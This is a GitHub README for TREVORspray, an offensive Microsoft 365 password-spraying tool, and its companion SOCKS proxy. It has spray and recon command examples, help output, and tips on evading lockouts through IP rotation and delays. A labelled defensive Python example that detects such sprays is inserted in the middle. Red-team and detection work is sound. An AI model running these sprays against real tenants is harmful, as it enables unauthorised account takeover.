300 Stars 45 Forks GNU General Public License v3.0 24 Commits 0 Opened issues


A featureful round-robin SOCKS proxy and Python O365 sprayer based on MSOLSpray



TREVORspray is a featureful Microsoft 365 password sprayer based on MSOLSpray

By @thetechr0mancer



  • Tells you the status of each account: if it exists, is locked, has MFA enabled, etc.
  • Automatic cancel/resume (remembers already-tried user/pass combos in
  • Round-robin proxy through multiple IPs using only vanilla
  • Automatic infinite reconnect/retry if a proxy goes down (or if you lose internet)
  • Spoofs
    to look like legitimate auth traffic
  • Logs everything to
  • Saves valid usernames to
  • Optional
    between requests to bypass M$ lockout countermeasures
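
Seen from the defending tenant's side, rotating source IPs and pacing requests mainly defeats failure counts that are kept per IP address. The following is an added example, not part of TREVORspray or the original page, comparing a per-IP failure count with a tenant-wide count of distinct failing users; the record fields, thresholds, addresses and function names are constructed for illustration.

```python
from collections import Counter
from datetime import datetime, timedelta

def make_events():
    """Constructed sign-in records (not a real log schema)."""
    t0 = datetime(2021, 10, 1, 9, 0, 0)
    ips = ["198.51.100.10", "198.51.100.20", "198.51.100.30"]
    events = []
    # One failed attempt per user, 5 s apart, source IP rotating each request.
    for i in range(9):
        events.append({"ts": t0 + timedelta(seconds=5 * i),
                       "user": f"user{i}@example.com",
                       "ip": ips[i % 3], "ok": False})
    # Benign noise: one user mistypes twice from one IP, then succeeds.
    for j, ok in enumerate([False, False, True]):
        events.append({"ts": t0 + timedelta(minutes=30, seconds=10 * j),
                       "user": "alice@example.com",
                       "ip": "203.0.113.7", "ok": ok})
    return sorted(events, key=lambda e: e["ts"])

def per_ip_alerts(events, threshold):
    """Source IPs with at least `threshold` failed sign-ins."""
    fails = Counter(e["ip"] for e in events if not e["ok"])
    return {ip for ip, n in fails.items() if n >= threshold}

def tenant_alerts(events, window, min_users):
    """Sliding window over all failures, ignoring source IP.

    Returns (window_start, distinct_users, distinct_ips) for every failure
    that leaves at least `min_users` distinct failing users in the window.
    """
    fails = [e for e in events if not e["ok"]]
    alerts, start = [], 0
    for end, ev in enumerate(fails):
        # Drop failures that have aged out of the window.
        while ev["ts"] - fails[start]["ts"] > window:
            start += 1
        span = fails[start:end + 1]
        users = {e["user"] for e in span}
        if len(users) >= min_users:
            ip_count = len({e["ip"] for e in span})
            alerts.append((fails[start]["ts"], len(users), ip_count))
    return alerts

if __name__ == "__main__":
    ev = make_events()
    print("per-IP alerts:", per_ip_alerts(ev, threshold=5))
    print("tenant alerts:", tenant_alerts(ev, timedelta(minutes=10), min_users=8))
```

The per-IP rule stays silent because each address carries only three failures, while the tenant-wide rule fires on the burst of distinct users and ignores the single user who mistyped a password.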


$ git clone
$ cd trevorspray
$ pip install -r requirements.txt

How To

  • First, get a list of emails for
    and perform a spray to see if the default configuration works. Usually it does.
  • If TREVORspray says the emails in your list don't exist, don't give up. Get the
    . The
    is the URL you'll be spraying against (with the
  • It may take some experimentation before you find the right combination of
    + email format.
    • For example, if you're attacking
      , it may not be as easy as spraying
      . You may find that Corp's parent company Evilcorp owns their Azure tenant, meaning that you need to spray against
      . Also, you may find that
      's internal domain
      is used instead of
    • So in the end, instead of spraying
      [email protected]
      , you're spraying
      [email protected]

Example: Perform recon against a domain (retrieves tenant info, autodiscover, mx records, etc.) --recon
    "token_endpoint": ""

Example: Spray against discovered "token_endpoint" URL -e emails.txt -p Fall2021! --url

Example: Spray with 5-second delay between requests -e [email protected] -p Fall2021! --delay 5

Example: Spray and round-robin between 3 IPs (the current IP is also used, unless
is specified) -e emails.txt -p Fall2021! --ssh [email protected] [email protected]

TREVORspray - Help:

$ ./ --help
usage: [-h] [-e EMAILS [EMAILS ...]] [-p PASSWORDS [PASSWORDS ...]] [-r DOMAIN [DOMAIN ...]] [-f] [-d DELAY] [-u URL] [-v] [-s [email protected] [[email protected] ...]] [-k KEY]
                      [-b BASE_PORT] [-n]

Execute password sprays against O365, optionally proxying the traffic through SSH hosts

optional arguments:
  -h, --help            show this help message and exit
  -e EMAILS [EMAILS ...], --emails EMAILS [EMAILS ...]
                        Emails(s) and/or file(s) filled with emails
  -p PASSWORDS [PASSWORDS ...], --passwords PASSWORDS [PASSWORDS ...]
                        Password(s) that will be used to perform the password spray
  -r DOMAIN [DOMAIN ...], --recon DOMAIN [DOMAIN ...]
                        Retrieves info related to authentication, email, Azure, Microsoft 365, etc.
  -f, --force           Forces the spray to continue and not stop when multiple account lockouts are detected
  -d DELAY, --delay DELAY
                        Sleep for this many seconds between requests
  -u URL, --url URL     The URL to spray against (default is
  -v, --verbose         Show which proxy is being used for each request
  -s [email protected] [[email protected] ...], --ssh [email protected] [[email protected] ...]
                        Round-robin load-balance through these SSH hosts ([email protected]) NOTE: Current IP address is also used once per round
  -k KEY, --key KEY     Use this SSH key when connecting to proxy hosts
  -b BASE_PORT, --base-port BASE_PORT
                        Base listening port to use for SOCKS proxies
  -n, --no-current-ip   Don't spray from the current IP, only use SSH proxies

Known Limitations:

  • Untested on Windows


TREVORproxy is a SOCKS proxy that round-robins requests through SSH hosts. Note that TREVORspray already has its own proxy feature (

), so this is for use with curl, Burpsuite, etc.

TREVORproxy - Help:

$ ./ --help
usage: [-h] [-p PORT] [-l LISTEN_ADDRESS] [-v] [-k KEY] [--base-port BASE_PORT] ssh_hosts [ssh_hosts ...]

Spawns a SOCKS server which round-robins requests through the specified SSH hosts

positional arguments:
  ssh_hosts             Round-robin load-balance through these SSH hosts ([email protected])

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT  Port for SOCKS server to listen on (default: 1080)
  -l LISTEN_ADDRESS, --listen-address LISTEN_ADDRESS
                        Listen address for SOCKS server (default:
  -v, --verbose         Print extra debugging info
  -k KEY, --key KEY     Use this SSH key when connecting to proxy hosts
  --base-port BASE_PORT
                        Base listening port to use for SOCKS proxies

CREDIT WHERE CREDIT IS DUE - MANY THANKS TO:

  • @dafthack for writing MSOLSpray
  • @Mrtn9 for his Python port of MSOLSpray
  • @KnappySqwurl for being a splunk wizard and showing me how heckin loud I was being :)


